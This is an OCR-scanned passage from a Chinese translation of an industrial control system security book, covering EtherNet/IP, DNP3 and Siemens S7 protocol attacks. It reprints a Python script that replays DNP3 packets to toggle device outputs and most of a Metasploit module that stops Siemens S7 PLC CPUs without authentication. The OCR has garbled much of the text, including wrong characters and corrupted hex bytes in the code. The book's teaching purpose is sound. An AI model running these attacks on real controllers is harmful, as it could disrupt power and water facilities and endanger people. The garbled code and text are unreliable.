d2 05 8f 86 af 12 99 de 18 fb 88 5f c7 bd 50 18 
3e 80 9f 80 00 00 65 00 04 00 00 00 00 BO 00 00 
00 00 00 00 00 00 00 0O 00 00 00 00 00 00 01 BO 
00 00 


5.2.2 ”EtherNet/IP 协 议 中 间 人 攻击 


EtherNet/IP 协 议 也 存在 许多 其 他 工业 协议 都 会 存在 的 安全 问题 。 和 咨询 培训 公司 Kenexis 上 发 布 了 一 组 针对 EtherNet/IP 协 议 的 中 间 人 攻击 演示 实例 。 这 些 例子 
表明 只 需要 对 序列 号 加 以 改动 ， 就 可 以 友 起 中 间 人 攻击 ， 可 以 在 括号 中 的 GitHub 页 面 获取 到 这 些 例子 (https://github.com/kenexis/PortablelCS-MITM) 。 与 
Modbus 协 议 不 同 ， 数 据 包 重 放 攻 击 对 于 EtherNet/IP 协 议 中 某 些 类 型 的 命令 并 没有 用 ， 因 此 实现 对 EtherNet/IP 协 议 的 攻击 过 程 会 更 加 复杂 一 些 。 不 过 对 于 大 部 
分 攻击 者 来 讽 ， 只 要 掌握 协议 的 基本 知识 ， 这 点 麻烦 根本 不 值得 一 提 。 一 旦 建立 了 会 话 句柄 并 协商 一 致 ， 正 如 前 文通 信和 会 话 所 显示 的 那样 ， 只 需要 手动 修改 序列 
号 就 可 以 重 放 网 络 流量 实现 中 间 人 攻击 ， 从 而 获得 同 使 用 Modbus-VCR 工 具 针 对 Modbus 协 议 发 起 中 间 人 攻击 相 类 似 的 效果 。 


5.2.3 ”EtherNet/IP 协 议 终 止 CPU 运 行 攻击 


= el 


pes 
MT : 


s Mal J) : 


与 Modicon 系 列 设 备 使 用 功能 码 90 终 止 CPU 运 行 的 情况 类 似 ， 一 些 EtherNet/IP 设 备 也 能 够 使 用 工程 软件 执行 命令 来 取得 同样 的 效果 。 在 Digital Bond 公 司 
Basecamp 项 目的 研究 过 程 中 ，Rapid7 公 司 发 布 了 一 款 Metasploit 模 块 
(https://www.rapid7.com/db/modules/auxiliary/admin/scada/multi_cip command) ， 该 模块 不 仅 可 以 终止 Allen-Bradley 公 司 Control-Logix 系 列 PLC 的 
运行 ， 还 可 以 引发 其 他 恶意 攻击 事件 比如 令 以 太 网 卡 骨 省 。 


(A=, Digital Bond 公 司 的 研究 员 Ruben Santamarta 就 Basecamp 项 目 中 对 Control-Logix PLC 实 施 攻击 的 记录 指出 
(http://reversemode.com/downloads/logix_report_basecamp.pdf) ，“ 我 们 友 送 的 每 一 个 ENIP 数 据 包 都 必须 包括 我 们 的 会 话 句 柄 。 这 就 够 了 ， 而 且 我 们 
ARS’ 控制 器 。 在 协议 层面 没有 其 他 的 “安全 ”措施 。”Ruben 指 出 如 果 知 道 了 会 话 句 柄 ， 那 么 攻击 EtherNet/IP 协 议 将 会 是 一 件 非 常 容易 的 事 。 为 了 执行 

该 攻击 ，Allen-Bradley 公 司 还 在 NOP 命 令 (0x00) 中 实现 了 一 个 功能 用 于 测试 。 


由 于 该 命令 依赖 于 Rockwell 公 司 和 Allen-Bradley 公 司 对 协议 的 实现 方式 ， 因 此 NOP 命 令 并 未 专门 记录 在 CIP 协 议 或 者 EtherNet/IP 协 议 的 协议 规范 中 。 通 过 
在 更 多 的 系统 上 开展 的 大 量 测试 ， 我 们 发 现在 部 分 早期 版 本 的 固件 中 不 仅 会 终止 ControlLogix PLC 中 CPU 的 运行 ， 而 且 还 会 导致 设备 贿 溃 从 而 进行 硬 重启 。 对 于 
该 型 号 设备 而 言 ， 必 须 拔 下 PLC 并 重新 插 上 才能 使 其 再 次 正常 运行 。 只 有 在 极 少 的 情况 下 ， 才 需要 对 PLC 重 新 进行 逻辑 编程 使 其 恢复 到 遭受 漏洞 利用 攻击 之 前 那样 
继续 运行 。 同 往常 一 样 ， 只 能 针对 非 生 产 设 备 上 开展 这 些 测试 ， 并 且 由 于 某 些 设备 在 执行 真实 的 命令 时 并 不 稳定 ， 所 以 要 确保 在 测试 时 拥有 足够 的 权限 来 运行 漏 
洞 利用 工具 发 起 攻击 。 


5.3 ”DNP3 协 议 


分 布 式 网 络 协 议 (Distributed Network Protocol, DNP3) 是 北美 地 区 电力 和 供水 设施 主要 使 用 的 控制 系统 协议 。 虽 然 该 协议 也 应 用 在 其 他 一 些 领域 里 ， 但 
并 不 是 很 常见 。DNP3 协 议 主要 用 于 数据 采集 系统 和 远程 设备 之 间 的 通信 。 其 主要 用 处 之 一 是 用 于 SCADA 系 统 中 控制 中 心 与 远程 变电站 之 间 的 通信 。 在 图 5-8 所 示 
的 模型 里 ，DNP3 协 议 通 常 采 用 主 站 和 从 站 (master/slave) 的 配置 模式 ， 控 制 中 心 为 SCADA 的 主 站 ， 而 变电站 则 部 署 远 程 终端 单元 (Remote Terminal 
Units, RTU) 。DNP3 协 议 的 设计 宗旨 是 成 为 一 套 能 够 在 多 种 介质 中 传输 并 对 系统 稳定 性 几乎 没有 影响 的 可 靠 协 议 。 这 些 网 络 介质 可 以 是 微波 、 扩 频 无 线 网 络 、 
拨号 线 、 双 绞 线 和 专用 线路 等 。DNP3 协 议 通常 使 用 TCP 协 议 的 20000 端 口 进行 通信 。 


根据 协议 规范 ， 每 一 个 DNP3 数 据 包 都 必须 以 0x05 和 0x64 两 个 字 节 开始 。 这 两 个 字 节 被 称 为 起 始 帧 (start frame) 或 者 起 始 字 节 (start byte) 。 数 据 链 路 
层 由 起 始 帧 开始 ， 起 始 帧 也 是 DNP3 数 据 包 的 第 一 部 分 数据 。 在 数据 链 路 层 ， 起 始 帧 乙 后 的 下 一 个 字 节 是 整个 数据 包 之 前 的 报 文 长 度 ， 该 报 文 长 度 不 将 CRC 计 算 在 
内 [直到 数据 包 的 应 用 部 分 为 止 。 再 之 后 是 控制 字 节 ， 该 帧 长 度 只 有 一 个 字 节 ， 包 含 了 关于 数据 包 内 容 的 信息 。 紧 接着 控制 帧 的 是 目的 地 址 帧 和 源 地 址 帧 ， 这 两 
个 帧 构成 了 指示 站 地 址 信息 的 一 共 四 个 字 节 长 度 的 内 容 。 在 数据 链 路 层 之 后 是 传输 控制 层 。 如 图 所 示 ， 该 层 对 较 长 的 报 文 进行 分 段 ， 并 且 记 录 分 段 数 据 包 的 顺 
序 。 


控制 中 心 


PRIE DUA DLA- H 


远程 终端 单元 


图 5-8 ”基于 DNP3 协 议 架 构 的 简单 远程 通信 示例 


vw Transport Control: Oxf0, Final, First(FIR, FIN, Sequence 48) 
lass aras = Final: Set 
as can = First: Set 
..11 0000 = Sequence: 48 


在 传输 控制 层 乙 后 的 数据 帧 ， 通 党 被 称 为 应 用 数据 块 (application data chunks) 。 在 应 用 数据 之 前 是 数据 的 长 度 ， 然 后 是 CRC 循 环 见 余 校 验 码 。 应 用 数据 
层 本 身 包 含 了 诸如 功能 码 和 应 用 控制 字段 之 类 的 信息 。DNP3 结 构 如 图 ?-9 所 示 。 


ir: 0x0564 


传输 控制 


应 用 数据 块 


应 用 控制 


内 部 指示 符 


图 5-9 ”DNP3 协 议 的 数据 包 结 构 


应 用 层 主 要 包含 设备 的 指令 ， 其 中 包括 确认 、 读 取 、 写 入 、 选 择 、 重 启 和 响应 等 功能 码 。 确 认 功 能 码 (0x00) 是 从 主 站 向 远程 设备 发 送 的 响应 指令 ， 用 以 确 
认 数 据 包 的 接收 。 读 取 功 能 码 (0x01) 由 主 站 发 送 到 远程 设备 ， 然 后 远程 设备 将 请 求 的 信息 返回 至 主 站 。 使 用 写 入 功能 码 (0x02) ， 远 程 设备 会 将 数据 包 中 的 对 
象 所 指定 的 数据 予以 存储 。 响 应 功能 码 (0x81 和 0x82) 由 主 站 进行 处 理 ， 用 以 对 请 求 进行 响应 ， 例 如 读 取 请 求 。 响 应 功能 码 和 非 请 求 响应 功能 码 之 间 的 区 别 在 
于 ， 非 请 求 响应 不 是 由 主 站 提出 的 显 式 请 求 。 远 程 设备 可 以 在 无 需 主 站 的 特定 请 求 的 情况 下 监测 事件 或 者 状态 并 发 送 响 应 。 表 5-2 列 出 了 DNP3 协 议 支 持 的 部 分 功 
能 码 ， 这 些 功能 码 既 是 评估 过 程 中 最 常用 到 的 功能 码 ， 也 是 针对 DNP3 协 议 发 起 攻击 时 最 有 趣 的 功能 码 。 


表 5-2 DNP3 协 议 功 能 码 


功 能 码 摘 述 


0x00 确认 功能 码 
0x01 读 取 功能 码 
0x02 写 人 功能 码 
0x03 选择 功能 码 
0x04 操作 功能 码 
0x05 直接 操作 功能 码 
0x0d 冷 重 司 功 能 码 
0x0e 热 重 启 功能 人 码 
0x12 终止 程序 功能 但 
Ox1b 删除 文件 功能 码 
0x81 啊 应 功能 码 
0x82 非 请 求 啊 应 功能 码 


和 Modbus 协 议 一 样 ，DNP3 协 议 也 允许 对 触 点 四 (points) 进行 读 写 。 如 图 所 示 ，DNP3 将 功能 码 0x05 作 为 直接 操作 功能 码 。 


v Application data chunks 
Application Chunk 0 Len: 16 CRC @x2111 
Application Chunk 1 Len: 5 CRC @xe964 
v Application Layer: (FIR, FIN, Sequence 4, Direct Operate) 
> Application Control: @xc4, First, Final(FIR, FIN, Sequence 4) 
Function Code: Direct Operate (0x05) 
v DIRECT OPERATE Request Data Objects 


v Object(s): Control Relay Output Block (0bj:12, Var:@1) (@x@c@1), 1 point 
> Qualifier Field, Prefix: 2-Octet Indexing, Code: 16-bit Single Field Quantity 
> Number of Items: 1 
> Point Number @ [Latch On] [NUL] 


00 c4 05 Oc 01 28 01 00 00 00 03 01 e8 03 00 00 e8 
10 03 00 00 00 


当 接 收 到 该 命令 时 ， 远 程 设 备 将 作用 于 由 数据 包 中 对 象 所 指定 的 输出 触 点 。 网 络 中 的 所 有 用 户 均 可 访问 触 点 ， 触 点 也 可 以 同 设备 进行 远程 通信 。 例 
如 ，py3 dnpturnt.py 脚 本 (https://github.com/sjhilt/scripts/blob/master/py3 dnpturnt.py) 可 以 同 opendnp3 和 树 莓 派 (Raspberry Pi) 协作 工作 (tS 
派 需 要 采用 PiFace Digital 扩 展板 进行 特殊 防护 [http://www.piface.org.uk/products/piface_digital/]) ， 一 旦 设置 完毕 ， 该 脚本 就 将 作用 于 触 点 用 以 对 迁移 到 
IO 块 设备 上 的 信号 灯 进 行 控制 。 


#!/usr/bin/env python 
# Author: Stephen J. Hilt & Chris Sistrunk 


= Written for ICS Village to demonstrate 
oes how replaying of DNP3 packets work. 
= 


# For use with Python 3 
HEHE FHHHFEHHEHEHEHEREHEEEHESERESHEEHE HEHEHE RES ES HES EE HSH 


import argparse 
import socket 
import sys 
import time 


# Argument Checking 


if (len(sys.argv) != 2): 
print ("USAGE: python ./py3 dnpturnt.py <host>") 
sys.exit() 


# host is passed in via cli arguments 

host=sys.argv[l1] 

# dnp3 port 

port=20000 

#assumes dnp3 master address=1 and dnp3 slave address=1024 


# make the socket and the connection to the host and port specified 
try: 
sock = socket.socket (socket .AF INET, socket.SOCK STREAM) 
sock.connect ( (host, port) ) 


except socket.error: 

print ("\n||\n|| Connection unsuccessful...\n||\n") 

sys.exit () 
# Set Digital Outputs 0/1 to Pulse On (Turn on lights) 
turnt 0 = b'\x05\x64\x1la\xc4\x00\x04\x01\x00\xec\x47\xc5\xc4\x05\x0c\x01\x28\x01\ 
x00\x00\x00\x03\x01\xe8\x03\x00\x00\x11\x21\xe8\x03\x00\x00\x00\x64\xe9'! 
turnt 1 = b'\x05\x64\x1la\xc4\x00\x04\x01\x00\xec\x47\xc7\xc6\x05\x0c\x01\x28\x01\ 
x00\x01\x00\x03\x01\xe8 \x03 \x00\x00\x2b\x70\xe8\x03\x00\x00\x00\x64\xe9'! 
# Set Digital Outputs 0/1 to Pulse Off (Turn off lights) 
turndown_0 = b'\x05\x64\x1la\xc4\x00\x04\x01\x00\xec\x47\xc6\xc5\x05\x0c\x01\x28\ 
x01\x00\x00\x00\x04\x01\xe8\x03 \x00\x00\xa3\x47\xe8\x03\x00\x00\x00\x64\xe9'! 
turndown_1 = b'\x05\x64\x1la\xc4\x00\x04\x01\x00\xec\x47\xc8\xc7\x05\x0c\x01\x28\ 
x01\x00\x01\x00\x04\x01\xe8 \x03 \x00\x00\x42\x9b\xe8\x03\x00\x00\x00\x64\xe9'! 
# infinite loop to toggle lights 
while True: 

# send the packets 

sock.send(turnt_0) 

sock.recv (4096) 

time.sleep (1) 

sock.send(turnt_1) 

sock.recv (4096) 

time.sleep (1) 

sock.send (turndown_0) 

sock.recv (4096) 

time.sleep (1) 

sock.send (turndown_1) 

sock.recv (4096) 

time.sleep (1) 


# close the socket. 
sock .close () 
sys.exit () 


DNP3 协 议 能 够 实现 系统 的 冷 重 启 和 热 重 启 ， 还 包括 远程 系统 的 完全 重启 或 部 分 重启 。 冷 重启 功能 码 (0x0d) 强制 远程 设备 进行 完全 重启 ， 清 空 所 有 的 硬件 
输出 至 安全 状态 。 并且 用 配置 信息 或 者 默认 值 重 新 进行 初始 化 。 热 重启 功能 码 (0x0e) 强制 远程 设备 进入 部 分 重 置 。 部 分 重 置 将 只 重 置 那些 需要 被 重 置 且 不 会 影 
响 到 其 他 进程 的 DNP3 应 用 程序 。 在 某 些 情况 下 ， 这 会 导致 数值 被 重 置 回 默认 值 或 被 重 置 为 配置 信息 中 的 内 容 。 当 接收 到 冷 重 启 或 热 重 启 指令 时 ， 远 程 设备 将 回复 
一 个 延迟 时 间 对 象 作为 响应 ， 随 后 进入 冷 重 局 或 热 重 启 状 态 。 所 发 送 的 延迟 时 间 对 象 指示 了 设备 停止 运行 的 预期 时 长 ， 在 此 期 间 设 备 将 无 法 提供 服务 ， 也 无 法 对 
主 站 请 求 做 出 响应 。 这 些 功能 码 指示 的 所 有 行为 都 特定 于 某 一 厂商 。 但 是 ， 可 以 肯定 地 设想 ， 这 些 功能 码 原 本 是 不 会 友 送 给 远程 变电站 中 RTU 的 。 不 过 借助 这 些 
功能 码 ， 部 分 厂商 将 不 再 对 重启 远程 系统 的 指令 提供 支持 。 


DNP3 协 议 里 的 功能 码 0x12 人 允许 主 站 发 送 终止 程序 运行 的 命令 至 远程 设备 。 功 能 码 0x10、0x11 和 0x12 的 组 合 可 以 令 主 站 分 别 初始 化 、 启 动 和 终止 应 用 程序 。 
这 些 应 用 程序 都 是 远程 设备 中 所 特有 的 ， 并 且 示 在 协议 中 定义 。 应 用 程序 可 以 从 事 很 多 工作 ， 一 个 非常 基本 的 例子 就 是 闭环 控制 (closed-loop control) 。 使 用 
请 求 中 的 应 用 程序 标识 符 对 象 (application identifier objects) 可 以 指定 应 用 程序 。 例 如 ， 在 捕获 的 数据 包 中 查找 某 个 程序 时 ， 对 象限 定 符 (object qualifier) 
字段 值 为 0x5b。 而 对 象 标识 符 (object identifier) 0x06 则 用 于 指示 远程 设备 上 的 所 有 应 用 程序 。 


5.3.1 DNP3 协 议 模 糊 测 试 攻 击 


JX BR TER : 


近 些 年 来 ， 基 于 Automatak 公 司 所 开展 的 安全 分 析 工 作 ，DNP3 协 议 经 历 了 一 系列 安全 审查 。Automatak 公 司 构建 了 opendnp3 协 议 栈 ， 并 随后 开 友 了 专门 
针对 DNP3 协 议 的 网 络 协议 模糊 测试 工具 用 于 挖掘 并 测试 DNP3 栈 中 的 漏洞 ， 如 图 5-10 所 示 。 其 他 商业 版 的 模糊 测试 工具 也 可 以 用 于 挖掘 工控 系统 协议 漏洞 ， 比 如 
Achilles 测 试 平台 (http://www.wurldtech.com/achilles.html) 和 模糊 测试 工具 Peach Fuzzer (http://www.peachfuzzer.com/wp- 
content/uploads/DNP3 DataSheet.pdf) 。 


PAR (th-HAR, (e(fAutomatak2a Fy AtemainvzsAegis (https://www.automatak.com/aegis/) 的 原因 之 一 是 ICS9-CERT 友 布 的 警告 信息 ， 其 中 
包括 了 31 个 关于 DNP3 协 议 的 漏洞 公告 ， 如 表 5-3 所 列 。 


Finished: test case #7425 - [7426 / 23520] 
Starting: test case #7426 - [7427 / 23520] 
~> master: True func: ACK length: 250 dest: 65532 src: 
-一 > Channel Tx: 287 
05 64 FA AO FC FF 01 00 7B 22 37 El OE F8 61 8D 32 
84 57 FD 2F 3B CO 7E 7C A8 86 62 D1 5E 3F AO 8D 70 
AF 60 81 OD E6 2D F9 20 30 04 2c 85 BB 75 7c 38 
OB 62 E7 3D 6B 81 47 3D FC 8E F5 02 OC C7 1B 6B 
95 5E C8 20 EA AA 89 61 55 Bl DF 5D 90 8B 44 C3 
64 5C EC 47 B6 4D FF F9 84 59 89 F3 81 1F F5 95 EC 
73 8B 16 OD 14 65 6D DE C9 D7 C6 28 79 DF 71 DF 61 53 
22 61 DO FB 30 DO B1 
11:25:45.382 - ~> master: True func: REQUEST LINK STATES length: 5 dest: 
11:25:45.382 - --> Channel Tx: 10 E 7 
05 64 05 C9 OA 00 01 OO FE DA 


: 


Enabled Name Params 

True link-seed0 i dest=10 

True link fill-FF i dest=10, fill=Constant 
True transport-seed0 dest=10 

True request-seedQ apprequest dest=10 

True request{ill-FF appTequest dest=10, fill=Constant 
True octets app-octet-wrte  dest=10 

rand-apprequest dest=10, count=1000000 


999999 


7426 of 23520 - 449 tests/sec - Remaining: 00:00:35 


图 5-10 ”Automatak 模 糊 测 试 工具 示例 


表 5-3 DNP3 协 议 漏洞 警告 


序 号 警告 编号 厂商 名 称 
6 Triangle Microworks 
13 Cybectec/Cooper 


(ZE ) 


序 “号 警告 编号 厂商 名 称 
16 Schneider Electric 
17 Schneider/Telvent 
21 Triangle Microworks 
24 CG Automation 
25 Rockwell Automation 


其 中 最 严重 的 警告 之 一 是 ICSA-13-282-01 公 告 (https://ics-cert.us-cert.gov/advisories/ICSA-13-282-01A) ， 该 漏洞 主要 影响 Alstom 公 司 的 e- 
Terracontrol 软 件 系 统 。 访 警告 的 成 因 在 于 未 对 输入 进行 正确 验证 ， 这 是 工控 系统 和 SCADA 系 统 中 的 常见 问题 。 一 个 精心 构造 的 DNP3 协 议 数 据 包 就 能 令 主 站 进 
入 死 循环 。 发 生 这 样 的 情况 时 ， 设 备 根 据 设 置 可 以 重 局 以 及 通过 系统 停机 进行 恢复 。 测 试 中 还 发 现存 在 对 某 些 采用 DNP3 协 议 的 系统 进行 响应 模糊 测试 

(Response Fuzzing) 的 可 能 性 。 对 DNP3 协 议 开 展 的 响应 模糊 测试 就 是 指 对 回 送 到 主 站 的 响应 数据 包 进行 模糊 测试 ， 耐 心地 从 远程 站 点 造成 主 站 的 崩 演 。 主 站 
所 处 的 位 置 是 主 控 室 ， 而 变电站 和 其 他 远程 设备 通常 并 没有 主 控 室 级 别 的 安全 防护 。 因 此 ， 这 种 类 型 的 漏洞 利用 表明 ， 利 用 SCADA 环 境内 部 的 本 地 协议 可 以 从 远 
程 无 人 值守 的 设施 实施 对 SCADA 系 统 的 入 侵 。 


5.3.2 DNP3 协 议 鉴 别 攻击 


Wit tT FE : 


类 似 于 Modbus 协 议和 EtherNet/IP 协 议 ， 也 有 脚本 能 够 通过 本 地 命令 和 响应 解析 帮助 用 户 识 别 出 基 于 DNP3 协 议 的 系统 。 某 Nmap 脚 本 可 以 测试 DNP3 协 议 
设备 内 部 的 起 始 100 个 地 址 用 于 获取 系统 响应 ， 然 后 识别 出 后 续 通 信 所 需要 的 地 址 。 该 脚本 的 执行 效果 如 下 图 所 示 ， 目 前 该 脚本 已 被 合并 进 Digital Bond 公 司 的 
Redpoint 项 目 ， 可 以 在 网 站 dnp3-info.nse 上 找到 (https://github.com/digitalbond/Redpoint/blob/master/dnp3-info.nse) 。 


Host is up (@.043s latency). 
PORT 
20000/tcp open 


STATE SERVICE 

DNP 3 

| dnp3-info: 

Source Address: 4 

| Destination Address: 3 
| Control: User Data (4) 


[1] 原文 在 计算 报 文 长 度 时 将 CRC 校 验 码 长 度 计算 在 内 ， 经 译 者 查阅 相关 资料 后 发 现 ， 该 报 文 长 度 在 计算 时 需要 将 CRC 字段 的 长 度 排除 在 外 
[2] 触 点 即 线圈 数据 ， 长 度 为 1 比特 。 一 译 者 注 


5.4 Siemens STEN 


9S7 通 信 协 议 ， 或 称 之 为 step7 通 信 协 议 ， 由 Siemens 公 司 基于 某 13O 协 议 实现 ， 该 协议 未 经 公开 并 且 采 用 了 非常 严格 的 控制 措施 。 对 于 Siemens200/300 系 列 
PLC， 借 助 Wireshark 的 解析 模块 对 其 流量 进行 分 析 ， 只 能 够 获得 该 协议 的 部 分 基本 信息 。 基 于 这 些 信息 ， 也 可 以 了 解 协议 基本 的 数据 包 结 构 ， 并 对 部 分 帧 结构 进 
行 解释 ， 如 图 5-11 所 示 。 


Time Source Destination Protocol Length Info 


5.4.1 


192. 168. 10.201 
192.168. 10.90 
192. 168. 10.90 
192.168. 10.201 
192.168. 10.90 
192. 168. 10.90 
192.168. 10.201 
192. 168. 10.90 
192. 168. 10. 90 
192.168. 10.201 
192.168. 10.90 
192. 168. 10.90 


Index: 0x0001 


192. 168. 10.90 
192.168. 10.201 
192.168. 10.201 
192.168. 10.90 
192.168. 10.201 
192.168. 10.201 
192.168.10.90 
192.168. 10.201 
192.168. 10.201 
192.168.10.90 
192.168. 10.201 
192.168. 10.201 


v SZL data tree (list count no. 1) 


COTP CR TPDU src-ref: 0x000c dst-ref: 0x0000 

TCP 102436213 [ACK] Seq=1 Ack=23 Win=560 Len=0 

COTP CC TPDU src-ref: 0x4431 dst-ref: 0x000c 

S7CO... ROSCTR: [Job ] Function: [Setup communication] 

TCP 102436213 [ACK] Seq=23 Ack=48 Win=56@ Len=@ 

S7CO... ROSCTR: [Ack_Data] Function: [Setup communication] 

S7CO... ROSCTR: [Userdata] Function: [Request] -> [CPU functions] -> [Read SZL] ID=0x00.. 
102+36213 [ACK] Seq=56 Ack=81 Win=560 Len=0 
ROSCTR: [Userdata] Function: [Response] -> [CPU functions] -> [Read SZL] ID=@xd... 
ROSCTR: [Userdata] Function: [Request] -> [CPU functions] -> [Read SZL] ID=0x00.. 
102+36213 [ACK] Seq=175 Ack=114 Win=56@ Len=0 
ROSCTR: [Userdata] Function: [Response] -> [CPU functions] -> [Read SZL] 


MLfB (Order number of the module): 6ES7 312-5AC02-0AB0 
BGTyp (Module type ID): 0x00f6 
Ausbg (Version of the module or release of the operating system): 
Ausbe (Release of the PG description file): 1 

Y SZL data tree (list count no. 2) 
Index: @x@006 


S7 协 议 终止 CPU 运 行 攻击 


图 5-11 S7 协 议 通 信和 数据 包 捕 获 示 例 


mets le : 


NH: 


Dillon Beresford 1 参与 完成 了 最 早 一 批 针对 Siemens S7 通 信 协 议 进 行 分 析 的 项 目 。 在 Black Hat2011 会 议 上 ， 他 对 Siemens S7 通 信 协 议和 设备 本 身 的 一 些 
安全 隐患 进行 了 演示 (https://media.blackhat.com/bh-us-11/Beresford/BH US11 Beresford S7 PLCs Slides.pdf) 。 类 似 于 已 经 发 现 的 Schneider 公司 旗下 
Modicon PLC 和 Allen-Bradley 公 司 PLC 中 的 Stop CPU 命 令 ，Dillon 友 现 利用 工程 软件 中 的 “TIA Portal” 功 能 可 以 终止 Siemens S7300/400 和 1200 系 列 PLC 中 远 
程 CPU 的 运行 (https://www.exploit-db.com/exploits/19831/ 和 https://www.exploit-db.com/exploits/19832/， 这 两 个 漏洞 的 漏洞 利用 代码 随后 将 在 本 节 提 
供 ) 。Dillon 进 行 测试 后 认为 即便 不 对 数据 包 进行 什么 改动 ，Siemens S7 通 信 协 议 也 会 通过 一 个 基本 的 重 放 数 据 包 予以 响应 。 采 用 一 个 已 经 发 布 但 尚未 在 产品 中 


加 以 集成 的 Metasploit 模 块 进行 分 析 后 发 现 ， 访 数据 包 未 加 改动 。 如 下 图 所 示 ， 第 一 个 数据 包 以 TPKT 帧 0x03 开 始 ， 其 中 0x03 是 版 本 号 ， 之 后 是 保留 字段 0x00， 
最 后 是 一 个 以 两 个 字 节 整数 (0x0016) 表示 的 TPKT 长 度 。 


stop cpu pkt = [ 


"\x@3\x@0\x00\x16\x11\xe@\x00\x00"+ 
~ \x@@\x3a\xO@@0\xc1\xO@2\x06\x@0\xc2"+ 
"\x82\x06\x80\xcO\x01\x@a", 


Ake IPKT ER Zia, COPO 1, AREA—-TMREFTR EKEFR ZA, SPDURHSR. BNSIAISRIRSIASR. Fiz Pa pate 
源 TSAP 字 段 和 目的 TSAP 字 段 。 经 过 多 次 测试 友 现 ， 如 果 设 备 没有 采用 源 引 用 0x0100 和 目的 引用 0x0102 做 出 响应 ， 那 么 只 需要 改变 这 些 字段 值 便 可 以 进行 通信 。 
例如 ，S71200 有 时 要 求 目的 引用 是 0x0200， 而 不 是 0x0102。 


Siemens Simatic S7-300/400 启 动 /终止 CPU 运行 模块 代码 


Exploit Title: Siemens Simatic S7 300/400 CPU command module 
Date: 7-13-2012 


Exploit Author: Dillon Beresford 
Vendor Homepage: http://www.siemens.com/ 


Tested on: Siemens Simatic S7-300 PLC 
CVE : None 


- HHH HH HS 


require 'msf/core' 
class Metasploit3 < Msf::Auxiliary 


include Msf::Exploit::Remote::Tcp 
include Rex: :Socket: :Tcp 
include Msf: :Auxiliary::Scanner 


def initialize(info = {}) 
super (update info(info, 

'Name'=> 'Siemens Simatic S7-300/400 CPU START/STOP Module', 

'Description' => %q{ 
The Siemens Simatic S7-300/400 S7 CPU start and stop 
functions over ISO-TSAP 
this modules allows an attacker to perform administrative 
commands without authentication. 
This module allows a remote user to change the state of 
the PLC between 
STOP and START, allowing an attacker to end process 
control by the PLC. 


)， 


'Author' => 'Dillon Beresford', 
'License' => MSF LICENSE, 
'References' => 
[ 
l ‘ORG, 
‘http: //www.us-cert.gov/control systems/pdf/ICS-ALERT-11-186-01.pdf' ], 
L 'URL', 


‘http: //www.us-cert.gov/control systems/pdf/ICS-ALERT-11-161-01.pdf' ], 
yy 
'Version' => 'SRevisions', 
'DisclosureDate' => 'May 09 2011' 
)) 


register options ( 
[ 
Opt: :RPORT (102), 
OptInt.new('MODE', 
false, 'Set true to put the CPU back into RUN 


mode.',false]), 
OptiInt.new('CYCLES', 
true,"Set the amount of CPU STOP/RUN cycles.",10] ) 
], self.class) 
end 


def run host (ip) 
begin 


cpu = datastore['MODE'] || '' 
cycles = datastore['CYCLES'] || '' 


stop cpu pkt = 
[ 
"\x03\x00\x00\x16\x11\xe0\x00\x00"+ 
"\x00\x01\x00\xc1\x02\x01\x00\xc2 "+ 
"X02101 \x02 \xeO (x01 \x09", 


"\x03\x00\x00\x19\x02\xf0\x80\x32"+4+ 


MwA Ne AAAA NN rE EN rE PN eA Nr NON ANN 


"\xO00\x£0\x00\x00\x01\x00\x01\x03"+ 
"\xc0 a 


"\x03\x00\x00\x1f£\x02\xf0\x80\x32"+ 
"\x01\x00\x00\x00\x00\x00\x0e\x00"+ 
"\x00\x04\x01\x12\x0a\x10\x02\x00"+ 
"\x40\x00\x01\x84\x00\x00\x00", 


"\x03\x00\x00\x1£\x02\xf0\x80\x32"4+ 
"\x01\x00\x00\x00\x01\x00\x0e\x00" 

"\x00\x04\x01\x12\x0a\x10\x02\x00"+ 

"\x10\x00\x00\x83\x00\x00\x00", 


"\x03\x00\x00\x21\x02\xf0\x80\x32"4+ 
"\x01\x00\x00\x00\x02\x00\x10\x00"+ 
"\x00\x29\x00\x00\x00\x00\x00\x09"+ 
"\x50\x5£\x50\x52\x4£\x47\x52\x41"4+ 
"\x4d", 


"\x03\x00\x00\x1f£\x02\xf0\x80\x32"+ 
"\x01\x00\x00\x00\x01\x00\x0e\x00"+ 
"\x00\x04\x01\x12\x0a\x10\x02\x00"+ 
"\x10\x00\x00\x83\x00\x00\x00", 


"\x03\x00\x00\x1f£\x02\xf0\x80\x32"4+ 
"\x01\x00\x00\x00\x01\x00\x0e\x00"+ 
"\x00\x04\x01\x12\x0a\x10\x02\x00"+ 
"\x10\x00\x00\x83\x00\x00\x00", 


"\x03 \x00\x00\xX1E\x02\x£0\x80\x32"+ 
"\x01\x00\x00\x00\x01\x00\x0e\x00"+ 
"\x00\x04\x01\x12\x0a\x10\x02\x00"+ 
"\x10\x00\x00\x83\x00\x00\x00", 


"\x03\x00\x00\xX1f£\x02\x£0\x80\x32"4+ 
"\x01\x00\x00\x00\x01\x00\x0e\x00"+ 
"\x00\x04\x01\x12\x0a\x10\x02\x00"+ 
"\x10\x00\x00\x83\x00\x00\x00", 


"\x03\x00\x00\x1E\x02\xf0\x80\x32"4+ 
"\x01\x00\x00\x00\x01\x00\x0e\x00"+ 


Hi -AAA LAA LLAI LLa AiL LA A La AAL LAANA L LAAT 


| 


"\XUU\XU4\XUL\XL4Z\XUA\XLU XUZXUU"™"+ 
"\x10\x00\x00\x83\x00\x00\x00", 


"\x03\x00\x00\xX1E\x02\x£0\x80\x32"+ 
"\x01\x00\x00\x00\x01\x00\x0e\x00"+ 
"\x00\x04\x01\x12\x0a\x10\x02\x00"+ 
"\x10\x00\x00\x83\x00\x00\x00", 


"\x03\x00\x00\x1£\x02\x£0\x80\x32"+4+ 
"\x01\x00\x00\x00\x01\x00\x0e\x00"+ 
"\x00\x04\x01\x12\x0a\x10\x02\x00"+ 
"\x10\x00\x00\x83\x00\x00\x00", 


"\x03\x00\x00\x1f£\x02\xf0\x80\x32"+ 
"\x01\x00\x00\x00\x01\x00\x0e\x00"+ 
"\x00\x04\x01\x12\x0a\x10\x02\x00"+ 
"\x10\x00\x00\x83\x00\x00\x00" 


start cpu pkt = 


l 


"\x03\x00\x00\x16\x11\xe0\x00\x00"+ 
"\x00\x01\x00\xc1\x02\x01\x00\xc2"+4+ 
"\x02\x01\x02\xc0O\x01\x09", 


"\x03\x00\x00\x19\x02\xf0\x80\x32"+4+ 
"\x01\x00\x00\x££\xf£f\x00\x08\x00"+ 
"\x00\xf0\x00\x00\x01\x00\x01\x03"+ 
"\xco" P 


"\x03\x00\x00\x1£\x02\xf0\x80\x32"4 
"\x01\x00\x00\x00\x00\x00\x0e\x00"+ 
